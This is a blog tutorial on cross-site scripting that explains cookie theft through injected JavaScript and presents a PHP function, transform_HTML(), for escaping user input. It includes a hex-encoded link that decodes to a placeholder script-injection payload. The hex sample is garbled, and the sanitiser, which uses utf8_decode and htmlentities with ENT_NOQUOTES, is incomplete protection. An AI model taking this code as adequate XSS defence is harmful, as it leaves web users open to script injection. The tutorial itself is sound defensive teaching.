Search

Cross-site scripting (XSS) and how to prevent it

  • Share this:
post-title

XSS stands for cross-site scripting. Unike most attacks, this exploit works on the client side. The most basic form of XSS is to put some Javascript in user-submitted content to steal the data in a user’s cookie. Since most sites use cookies and sessions to identify visitors, the stolen data can then be used to impersonate that user – which is deeply troublesome when its a typical user account, and downright disastrous if it’s the administrative account. If you don’t use cookies or session IDs on your site, your users aren’t vulnerable, but you should still be aware of how this attack works.

Unlike MySQL injection attacks, XSS attacks are difficult to prevent. yahoo, eBay and Microsoft have all been affected by XSS. Although the attack doesn’t involve PHP, you can use PHP to strip user data in order to prevent attacks. To stop an XSS attack, you have to restrict and filter the data a user submits to your site. It is for this precise reason that most online bulletin boards don’t allow the use of HTML tags in posts and instead replace them with custom tag formats such as [b] and [links].

Let’s look at a simple script that illustrates how to prevent some of these attacks. For a more complete solution, use SAFEHTML, discussed later in this post.

// Helps prevent XSS attacks
function transform_HTML($string, $length = null) {

		// Remove dead space
		$string = trim($string);

		// Prevent potential Unicode codec problems.
		$string = utf8_decode($string);

		// HTMLize HTML-specific characters
		$string = htmlentities($string, ENT_NOQUOTES);
		$string = str_replace("#", "&#35", $string);
		$string = str_replace("%", "&#37", $string);

		$length = intval($length);
		if($length > 0) {
			$string = substr($string, 0, $length);
		}

		return $string;

}

This function transforms HTML-specific characters into HTML literals. A browser renders any HTML run through this script as text with no markup. For example, lets consider this HTML string.

<strong>Bold Text</strong>

Normally, this HTML would render as follows:

Bold Text

However, when run through transform_HTML(), it renders as the original input. The reason is that the tag characters are HTML entities in the processed string. The resulting string from HTML() in plaintext looks like this:

&lt ;strong&gt ;Bold Text&lt ;/strong&gt ;

The essential piece of this function is the htmlentities() function call that transforms <,> and & into their entity equivalents of < , > and &. Although this takes care of the most commo attacks, experienced XSS hackers have another sneaky trick up their sleeve: Encoding their malicious scripts in hexadecimal of UTF-8 instead of normal ASCII text, hoping to circumvent your filters. They can send the code along as a GET variable in the URL, saying, “Hey, this is a hexadecimal code, but you could you run it for me anyway?”. A hexadecimal example looks something like this.

<a href="https://alltopdevs/a.php?variable422%3e %3c%53%43%52%49%50%54%3e%44 %6n73%6n6665%74%68%69%6e%67%6d%61%6&6063%69%6f%75%73%3c%2M043%52 %4050%54%3e"> 

But when the browser renders that information, it turns out to be:

<a href="https://alltopdevs/a.php?variable="><SCRIPT>Dosomethingmalicious</SCRIPT>

To prevent this, transform_HTML() takes the additional steps of converting # and % signs itto their entity, shutting down hex attackes, and converting UTF-8 encoded data.

Finally, just in case someone tries to overload a string with a very long input, hoping to crash something, you can add an optional $length parameter to trim the string to the maximum length you specify.

Design | UX | Software Consultant
View all posts (125)